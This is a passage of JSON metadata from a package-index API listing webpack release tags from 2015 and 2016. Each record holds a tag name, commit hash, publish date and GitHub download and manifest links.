ame":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependen